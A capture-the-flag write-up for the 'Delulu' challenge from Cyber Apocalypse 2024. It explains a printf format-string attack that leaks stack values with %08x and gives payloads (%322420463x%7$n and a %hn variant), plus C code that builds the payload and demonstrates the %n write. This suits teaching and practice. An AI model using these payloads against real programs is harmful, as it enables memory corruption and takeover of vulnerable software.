Cyber Apocalypse 2024: Hacker Royale

Delulu

Personal Rating: Hard


Last updated 1 year ago

I checked out the file with Ghidra and had a look at the main function:

I patched 0x1337beef to 0x1337babe here to test the delulu function.

We need to overwrite two bytes, replacing 'babe' with 'beef' so that the stored value matches the 0x1337beef the check compares against, most likely with an overflow.

I tried it with gdb. Since the read function reads 0x1f (31) chars, I created a file input.txt with 31 As and a lot of trailing Bs.

I then found out the address after the read function when the program is run and set a breakpoint there.

I then ran the thing with run < input.txt and inspected the stack with si step by step. 32 characters are read, the last of which is a B, but we did not overwrite anything :(

A friend of mine solved the challenge and told me how he did it. I did not know this attack, but I want to learn to do it myself:

Looking at the main function again, the interesting part takes place here:

The stack overflow did not work, so the issue should be somewhere else. Since the printf call comes directly before the impossible check, I simply searched for "printf vulnerability" and found a lot of articles about format string attacks, which is very interesting.

The %n conversion writes the number of characters emitted so far: printf reads the corresponding argument as a pointer and stores the count at the address it points to. So if we can emit 322420463 characters (0x1337beef in decimal) and point %n at the variable holding 0x1337babe, we overwrite it with 0x1337beef.

Let's play around with this in gdb, feeding the program an input file.

Back to main after read:

0x5555555554ab. Interesting.

We see the value 0x1337babe there.

>> %08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x

[!] Checking.. 6ff22560.00000000.b7314887.00000010.7fffffff.1337babe.

This was the payload that my friend came up with:

%322420463x%7$n

Here is how it works:

%322420463x # a %x conversion with a minimum field width of 322420463, so printf emits exactly that many characters (0x1337beef in hex)

%7$n # %n with the explicit argument index 7: it stores the number of characters emitted so far (0x1337beef) as a 4-byte int through the pointer found in the 7th argument

So the payload pads the output to 0x1337beef characters and then writes that count through the pointer sitting at argument 7. Note that %n does not write into the 7th slot itself: the slot has to hold the address of the variable containing 0x1337babe, which is why this offset is the one that works. The whole payload is 15 bytes, well within the 31 characters that read accepts.

To determine the required offset, print one argument at a time with %4$x, then %5$x, and so on (the dotted %08x line above does the same in a single run) until the value 0x1337babe is output. This was the case at the 6th argument. Since %n needs a pointer to the variable rather than the variable itself, the write goes through the next slot, so offset 7.
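As an added example (my own code, not from the page or the challenge binary): the padded %x plus %n write used by the payload above, with the pointer handed to printf explicitly so the demonstration does not depend on the stack layout, and a small builder that produces the exact payload string. The arrangement it assumes, an 8-byte value holding 0x1337babe and a pointer to it that %n writes through, is my assumption based on the fact that %7$n works, not something shown on the page; the little-endian layout is assumed too. It also goes one step beyond the page: since only the two low bytes differ (babe versus beef), a %hn write with 0xbeef = 48879 characters of padding reaches the same state with far less output than 322 MB.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constants from the challenge: the stored value and what the check wants. */
#define INITIAL_VALUE 0x1337babeL
#define WANTED_VALUE  0x1337beefL

/* Build the attacker's format string. build_payload(322420463, 7, 0) yields
 * "%322420463x%7$n" (the page's payload); build_payload(48879, 7, 1) yields
 * "%48879x%7$hn" (two-byte variant). Returns a static buffer, so use the
 * result before calling again. */
static const char *build_payload(int count, int argpos, int two_bytes)
{
    static char payload[32];
    snprintf(payload, sizeof payload, "%%%dx%%%d$%sn",
             count, argpos, two_bytes ? "h" : "");
    return payload;
}

/* Core of the technique. Print `width` characters with one padded %x, then
 * let %n (4-byte write) or %hn (2-byte write) store the running character
 * count through `dest`. The pointer is passed explicitly here (assumption:
 * in the challenge printf pulls it from the 7th vararg slot, which is what
 * "%7$n" selects). Output goes to a heap buffer instead of stdout so the
 * only visible effect is the write to *dest. Returns the number of
 * characters emitted, which equals `width` whenever width >= 8 (the printed
 * hex value is 8 characters long), or -1 if allocation fails. */
static int padded_write(long *dest, int width, int two_bytes)
{
    size_t cap = (size_t)width + 16;
    char *out = malloc(cap);
    int emitted;

    if (out == NULL)
        return -1;
    if (two_bytes)
        emitted = snprintf(out, cap, "%*x%hn", width, (unsigned)*dest, (short *)dest);
    else
        emitted = snprintf(out, cap, "%*x%n", width, (unsigned)*dest, (int *)dest);
    free(out);
    return emitted;
}

/* Start from 0x1337babe, apply the write, return what the check would see.
 * Assumes little-endian: %n replaces the low four bytes of the 8-byte value,
 * %hn only the low two. */
static long overwrite_with(int width, int two_bytes)
{
    long value = INITIAL_VALUE;
    if (padded_write(&value, width, two_bytes) < 0)
        return -1;
    return value;
}

int main(int argc, char **argv)
{
    /* The page's payload: 322420463 characters, 4-byte write. Building the
     * string is cheap; actually performing the write needs ~322 MB of
     * padding, so only do that when asked for with "./a.out full". */
    const char *full = build_payload((int)WANTED_VALUE, 7, 0);
    printf("full payload : %s (%zu bytes, fits the 31-byte read)\n", full, strlen(full));
    if (argc > 1 && strcmp(argv[1], "full") == 0)
        printf("after %%n    : 0x%lx\n", overwrite_with((int)WANTED_VALUE, 0));

    /* Only the low two bytes differ (babe -> beef), so a %hn write with
     * 0xbeef = 48879 characters of padding reaches the same state. */
    const char *shrt = build_payload((int)(WANTED_VALUE & 0xffff), 7, 1);
    printf("short payload: %s\n", shrt);
    printf("after %%hn   : 0x%lx\n", overwrite_with((int)(WANTED_VALUE & 0xffff), 1));
    return 0;
}
```

The format strings given to snprintf here are literals, so glibc's fortify check (which aborts on %n in a writable format string) does not trigger; the challenge binary is vulnerable precisely because it passes the user's buffer as the format. Against the real target the two-byte variant would be "%48879x%7$hn", which also fits in the 31-byte read.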

https://owasp.org/www-community/attacks/Format_string_attack
https://security.stackexchange.com/questions/43574/how-is-printf-in-c-c-a-buffer-overflow-vulnerability
https://axcheron.github.io/exploit-101-format-strings/